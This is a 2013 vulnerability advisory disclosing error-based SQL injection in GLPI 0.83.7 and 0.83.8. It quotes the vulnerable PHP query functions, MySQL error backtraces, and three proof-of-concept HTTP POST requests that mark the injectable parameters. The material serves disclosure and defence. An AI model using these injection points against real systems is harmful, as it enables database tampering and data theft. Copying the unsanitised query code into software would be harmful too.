GLPI v0.83.8 Multiple Error-based SQL Injection Vulnerabilities Vendor: INDEPNET Development Team Product web page: http://www.glpi-project.org Affected version: 0.83.7 and 0.83.8 Summary: GLPI, an initialism for Gestionnaire libre de parc informatique (Free Management of Computer Equipment), was designed by Indepnet Association (a non profit organisation) in 2003. GLPI is a free asset and IT management software package, it also offers functionalities like servicedesk ITIL or license tracking and software auditing. Desc: Input passed via the POST parameter 'users_id_assign' in '/ajax/ticketassigninformation.php' script, POST parameter 'filename' in '/front/document.form.php' script, and POST parameter 'table' in 'glpi/ajax/comments.php' script is not properly sanitised before being used in SQL queries. This can be exploited by a malicious attacker to manipulate SQL queries by injecting arbitrary SQL code in the affected application. ====================================================================== /inc/db.function.php: --------------------- 274: function countElementsInTable($table, $condition="") { 275: global $DB; 276: 277: if (is_array($table)) { 278: $table = implode('`,`',$table); 279: } 280: 281: $query = "SELECT COUNT(*) AS cpt 282: FROM `$table`"; 283: 284: if (!empty($condition)) { 285: $query .= " WHERE $condition "; 286: } 287: 288: $result =$DB->query($query); 289: $ligne = $DB->fetch_array($result); 290: return $ligne['cpt']; 291: } ---------------------------------------------------------------------- *** MySQL query error : *** SQL: SELECT COUNT(*) AS cpt FROM `glpi_tickets`,`glpi_tickets_users` WHERE `glpi_tickets_users`.`tickets_id` = `glpi_tickets`.`id` AND `glpi_tickets_users`.`users_id` = \'2\'\' AND `glpi_tickets_users`.`type` = \'2\' AND `glpi_tickets`.`is_deleted` = 0 AND `glpi_tickets`.`status` NOT IN (\'solved\', \'closed\') Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2' AND `glpi_tickets`.`is_deleted` = 0 ' at line 3 Backtrace : /var/www/html/glpi/inc/db.function.php :288 DBmysql->query() /var/www/html/glpi/inc/commonitilobject.class.php :362 countElementsInTable() /var/www/html/glpi/ajax/ticketassigninformation.php :66 CommonITILObject->countActiveObjectsForTech() /var/www/html/glpi/ajax/ticketassigninformation.php ====================================================================== /inc/document.class.php: ------------------------ 1221: static function isValidDoc($filename) { 1222: global $DB; 1223: 1224: $splitter = explode(".",$filename); 1225: $ext = end($splitter); 1226: 1227: $query="SELECT * 1228: FROM `glpi_documenttypes` 1229: WHERE `ext` LIKE '$ext' 1230: AND `is_uploadable`='1'"; 1231: 1232: if ($result = $DB->query($query)) { 1233: if ($DB->numrows($result)>0) { 1234: return Toolbox::strtoupper($ext); 1235: } 1236: } 1237: return ""; 1238: } ---------------------------------------------------------------------- *** MySQL query error : *** SQL: SELECT * FROM `glpi_documenttypes` WHERE `ext` LIKE \'1\'\' AND `is_uploadable`=\'1\' Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 3 Backtrace : /var/www/html/glpi/inc/document.class.php :1232 DBmysql->query() /var/www/html/glpi/inc/document.class.php :1088 Document::isValidDoc() /var/www/html/glpi/inc/document.class.php :275 Document::uploadDocument() /var/www/html/glpi/inc/commondbtm.class.php :878 Document->prepareInputForUpdate() /var/www/html/glpi/front/document.form.php :99 CommonDBTM->update() /var/www/html/glpi/front/document.form.php ====================================================================== /inc/dbmysql.class.php: ----------------------- 364: function list_tables($table="glpi_%") { 365: return $this->query("SHOW TABLES LIKE '".$table."'"); 366: } ---------------------------------------------------------------------- *** MySQL query error : *** SQL: SHOW TABLES LIKE \'%glpi_users\'%\' Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1 Backtrace : /var/www/html/glpi/glpi/inc\dbmysql.class.php :365 DBmysql->query() /var/www/html/glpi/inc/db.function.php :1182 DBmysql->list_tables() /var/www/html/glpi/ajax/comments.php :47 TableExists() /var/www/html/glpi/ajax/comments.php ====================================================================== Tested on: Microsoft Windows 7 Ultimate SP1 (EN) - Apache/2.4.3, PHP/5.4.7 Linux CentOS 6.0 (Final) - Apache/2.2.15, PHP/5.3.3 Vulnerabilities discovered by Humberto Cabrera @dniz0r Zero Science Lab - http://www.zeroscience.mk Advisory ID: ZSL-2013-5146 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5146.php 09.05.2013 ---------------- {1} POST /glpi/ajax/ticketassigninformation.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://localhost/glpi/front/ticket.form.php Content-Length: 17 Cookie: PHPSESSID=5ducm98racrn23u3bl0kq8ap02 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache users_id_assign=2{SQL_Injection} ---------------- {2} POST /glpi/front/document.form.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/glpi/front/document.form.php?id=4 Cookie: PHPSESSID=5ducm98racrn23u3bl0kq8ap02 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------19302542618340 Content-Length: 1699 -----------------------------19302542618340 Content-Disposition: form-data; name="entities_id" 0 -----------------------------19302542618340 Content-Disposition: form-data; name="is_recursive" 0 -----------------------------19302542618340 Content-Disposition: form-data; name="name" test -----------------------------19302542618340 Content-Disposition: form-data; name="comment" test -----------------------------19302542618340 Content-Disposition: form-data; name="current_filepath" -----------------------------19302542618340 Content-Disposition: form-data; name="current_filename" -----------------------------19302542618340 Content-Disposition: form-data; name="filename"; filename=1{SQL_Injection} Content-Type: application/octet-stream -----------------------------19302542618340 Content-Disposition: form-data; name="upload_file" -----------------------------19302542618340 Content-Disposition: form-data; name="link" test -----------------------------19302542618340 Content-Disposition: form-data; name="documentcategories_id" 0 -----------------------------19302542618340 Content-Disposition: form-data; name="mime" application/octet-stream -----------------------------19302542618340 Content-Disposition: form-data; name="update" Update -----------------------------19302542618340 Content-Disposition: form-data; name="_read_date_mod" 2013-06-14 20:27:56 -----------------------------19302542618340 Content-Disposition: form-data; name="id" 4 -----------------------------19302542618340 Content-Disposition: form-data; name="_glpi_csrf_token" f27853afa3e705b5042c0ae4d135679c -----------------------------19302542618340-- ---------------- {3} POST /glpi/ajax/comments.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive Content-Length: 59 Origin: http://localhost X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: */* Referer: http://localhost/glpi/front/planning.php Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Cookie: PHPSESSID=frk5prfmarsc9ebo1u751skkb2 value=5&table=glpi_users{SQL Injection}&withlink=comment_link_uID302668907 ----------------